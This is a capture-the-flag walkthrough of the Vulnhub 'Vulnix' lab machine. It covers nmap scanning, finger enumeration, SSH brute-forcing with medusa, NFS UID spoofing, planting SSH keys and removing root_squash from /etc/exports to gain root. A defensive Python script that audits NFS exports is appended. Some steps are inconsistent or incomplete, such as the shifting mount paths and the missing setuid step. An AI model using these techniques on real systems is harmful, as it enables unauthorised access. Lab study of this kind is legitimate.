Today we are working on the Vulnix machine from Vulnhub.
Let's find the IP first.
nmap -sN 192.168.18.92/24
We got the IP, 192.168.18.93.
Let's do a detailed scan now.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT
Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
79/tcp open finger Linux fingerd
110/tcp open pop3 Dovecot pop3d
|_sslv2-drown:
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33365/udp6 mountd
| 100005 1,2,3 47947/tcp6 mountd
| 100005 1,2,3 56458/udp mountd
| 100005 1,2,3 57756/tcp mountd
| 100021 1,3,4 39547/udp nlockmgr
| 100021 1,3,4 47952/tcp6 nlockmgr
| 100021 1,3,4 53508/udp6 nlockmgr
| 100021 1,3,4 53795/tcp nlockmgr
| 100024 1 38357/udp status
| 100024 1 39369/tcp status
| 100024 1 48082/udp6 status
| 100024 1 57952/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2049/tcp open nfs_acl 2-3 (RPC #100227)
39369/tcp open status 1 (RPC #100024)
42985/tcp open mountd 1-3 (RPC #100005)
48267/tcp open mountd 1-3 (RPC #100005)
53795/tcp open nlockmgr 1-4 (RPC #100021)
57756/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.97 ms 192.168.18.93
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds
Finger is running on port 79. Let's do some user enumeration first.
We got a few users.
Let's try brute-forcing the logins.
Make a text file with the usernames.
Let's run medusa with rockyou.txt.
medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt
Let's enumerate further while the brute forcing runs in the background.
From the detailed scan above, we can see that NFS is running on port 2049. Let's go deeper.
nmap -sV --script=nfs-* 192.168.18.93
We have an NFS share at /home/vulnix. Let's try to mount it on our machine.
But we don't have permission to open it.
Let's go back to medusa and check the results.
So, the password for user is letmein.
Let's try to log in to the machine.
Let's now check the /etc/passwd file and get the details for the vulnix user.
If we add this user to our own system with the same UID, 2008, we can read the mounted directory, right? The share is checked against the numeric UID our client reports, so a matching local account should be enough. Let's try.
useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la
We got access to vulnix’s home folder.
If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys, we can log in without a password.
Create a key if you have not created one yet.
ssh-keygen -t rsa
Now add the public key to /tmp and change the owner to vulnix.
Add the file to /mnt/vulnix/.ssh/authorized_keys.
Now we can log in as vulnix on the target machine without a password.
Let's see what we can do with this user.
sudo -l
We can edit the /etc/exports file as root without a password.
According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/, root_squash in the *(rw,root_squash) entry is used to prevent file access as root. Since we have edit access to this file, we can change that.
Made the change and saved.
We need to restart NFS for the change to take effect. Since we don't have root access, let's restart the machine.
Now remount the share and copy our /bin/bash to the mounted directory.
root@kali:/mnt/vulnix# cp /bin/bash .
The file is present in the home folder of vulnix, with root as its owner. Let's try to run it.
./bash
whoami
root
So we got root access on Vulnix too. Next day, next machine!
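A defender's check for the two weaknesses this walkthrough relies on, the UID-matched read of the share and the editable /etc/exports entry: the Python below is an added example, not part of the original post, that parses exports(5) text and flags entries that drop root squashing, export to any host, or accept client-supplied UIDs. The finding codes and every sample entry except the /home/vulnix line are assumptions made for illustration.

```python
# Added example: audit exports(5) text for the settings abused in this walkthrough.
CHECKS = {
    "NO_ROOT_SQUASH": "client root keeps UID 0 on the share",
    "ANY_HOST": "exported to every host that can reach the server",
    "UID_TRUSTED": "AUTH_SYS allowed: server believes the UID the client sends",
}

def parse_exports(text):
    """Yield (path, client, options) for each client spec in exports(5) text."""
    text = text.replace("\\\n", " ")               # join continuation lines
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()       # drop comments and blanks
        if not line:
            continue
        path, *specs = line.split()
        defaults = set()
        for spec in specs or ["*"]:                # no client listed: world
            if spec.startswith("-"):               # "-opt,opt" sets line defaults
                defaults |= set(spec[1:].split(","))
                continue
            client, _, rest = spec.partition("(")
            opts = set(filter(None, rest.rstrip(")").split(",")))
            yield path, client or "*", defaults | opts

def audit(text):
    """Return sorted (path, client, code) findings for risky export entries."""
    findings = set()
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.add((path, client, "NO_ROOT_SQUASH"))
        if client == "*":                          # bare wildcard only
            findings.add((path, client, "ANY_HOST"))
        # With no sec= option the flavor is sys, i.e. UIDs are taken on trust.
        flavors = [f for o in opts if o.startswith("sec=") for f in o[4:].split(":")]
        krb_only = bool(flavors) and all(f.startswith("krb5") for f in flavors)
        if not krb_only and "all_squash" not in opts:
            findings.add((path, client, "UID_TRUSTED"))
    return sorted(findings)

SAMPLE = """\
# Constructed sample; the first entry uses the share and options quoted above.
/home/vulnix  *(rw,root_squash)
/srv/build    10.0.0.5(rw,no_root_squash,sec=krb5p)
/srv/pub      (ro,all_squash)
"""

if __name__ == "__main__":
    for path, client, code in audit(SAMPLE):
        print(f"{path} [{client}] {code}: {CHECKS[code]}")
```

Run against the real /etc/exports on a schedule and alert on any change in findings; pairing it with a review of sudo rules that let non-root users edit that file covers the path shown here.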